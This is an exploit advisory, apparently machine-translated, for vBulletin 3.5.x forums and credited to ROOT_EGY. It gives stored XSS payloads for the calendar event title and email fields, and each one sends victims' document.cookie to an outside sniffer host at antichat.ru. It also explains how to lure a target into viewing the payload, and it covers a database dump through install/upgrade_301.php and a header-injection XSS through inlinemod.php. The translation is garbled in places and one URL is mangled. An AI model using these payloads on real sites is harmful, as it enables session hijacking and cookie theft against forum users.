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vBulletin v3.5.2 XSS Vulnerabilities

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# Title: vBulletin Version 3.5.2 - Introduction XSS scripting
# Author: Discovered by ROOT_EGY
# Version: vBulletin Version 3.5.2


3.5.2 - Introduction XSS scripting
The vulnerability is in the field «title» scenario «calendar.php».
TITLE :---> Test <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s.jpg?» + Document.cookie; </ script>
BODY :----> No matter
OTHER OPTIONS: -> No matter
That all went off to go to the calendar, create a new event in the header to prescribe <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s.jpg?» + Document. cookie; </ script>, then go look at the link, which is our event and give to the show to someone who want to steal a cookie.
3.5.3 - Introduction XSS scripts in the field «Email Address» in the module «Edit Email & Password».

pass: your pass
email: vashe@milo.com "> <script> img = new Image (); img.src =« http://antichat.ru/cgi-bin/s.jpg? »+ document.cookie; </ script> . nomatt
Note About lenght limitation
forum / profile.php? do = editoptions
Receive Email from Other Members = yes
www.server.com/forumpath/sendmessage.php?do=mailmember&u = (your id)
In the email write vashe@milo.com "> <script> img = new Image (); img.src =« http://antichat.ru/cgi-bin/s.jpg? »+ Document.cookie; </ script>. nomatt. Once preserved, it is important to make the option email visible to all. Then the helmet someone www.xhh777hhh.som/forumpath/sendmessage.php?do=mailmember&u = (your id) and get a cookie on our address sniffer.

3.5.4 - Dump database
The vulnerability is in the scripts directory upgrade_301.php 'install'.
Example: server.com/forumpath/install/upgrade_301.php?step=SomeWord

3.5.4 - Introduction XSS scripting
The vulnerability is in the url parameter scenario inlinemod.php.
Example: www.server.com/forumpath/inlinemod.php?do=clearthread&url=lala2% 0d% 0aContent-Length:% 2033% 0d% 0a% 0d% 0a <html> Hacked! </ Html>% 0d% 0a% 0d% 0a


ROOT_EGY to connect: r0t@hotmail.es


Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.


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